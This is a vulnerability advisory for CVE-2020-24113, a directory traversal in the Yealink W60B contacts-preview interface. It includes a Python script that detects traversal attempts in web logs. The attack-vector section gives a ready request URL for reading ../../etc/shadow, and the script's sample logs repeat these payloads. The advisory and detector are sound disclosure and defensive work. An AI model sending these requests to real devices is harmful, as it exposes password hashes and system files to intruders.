CVE-2020-24113

[Vulnerability Type]

Directory Traversal


[Affected Component]

Contacts file upload interface


[Attack Type]

Context-dependent


[Impact Denial of Service]

true


[Impact Information Disclosure]

true


[Attack Vectors]

Request https://{IP}/servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename={file}, replacing the {file} parameter with the path of the file you want to read, e.g. ../../etc/shadow or ../../proc/cpuinfo
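
For detection, the following added example (not part of the original advisory or any vendor code) scans web access logs for requests to the contacts-preview endpoint whose filename parameter leaves the intended directory. It assumes requests to the device are logged in common log format, for instance by a reverse proxy; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in common log format (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2020:10:00:01 +0000] "GET /servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename=contacts.xml HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Sep/2020:10:02:13 +0000] "GET /servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename=../../etc/shadow HTTP/1.1" 200 1204',
    '192.0.2.44 - - [01/Sep/2020:10:02:20 +0000] "GET /servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename=..%2F..%2Fproc%2Fcpuinfo HTTP/1.1" 200 880',
    '192.0.2.10 - - [01/Sep/2020:10:05:00 +0000] "GET /servlet?m=mod_data&p=status HTTP/1.1" 200 300',
]

# Client address and request target from a common-log-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so the value is normalised before checking."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_filename(url):
    """Return the decoded filename if the request targets contacts-preview
    with a filename that leaves the intended directory, else None."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if params.get("p") != ["contacts-preview"]:
        return None
    for raw in params.get("filename", []):
        name = fully_decode(raw).replace("\\", "/")
        # Flag absolute paths and any ".." path segment.
        if name.startswith("/") or ".." in name.split("/"):
            return name
    return None

def scan(lines):
    """Return (client, decoded filename) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (name := suspicious_filename(m.group(2))):
            hits.append((m.group(1), name))
    return hits

if __name__ == "__main__":
    for client, name in scan(SAMPLE_LOG):
        print(f"traversal attempt from {client}: filename={name}")
```
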


[Discoverer]

fuomag9


[Reference]

http://yealink.com


[Vendor of Product]

Yealink


[Affected Product Code Base]

Yealink W60B 77.83.0.85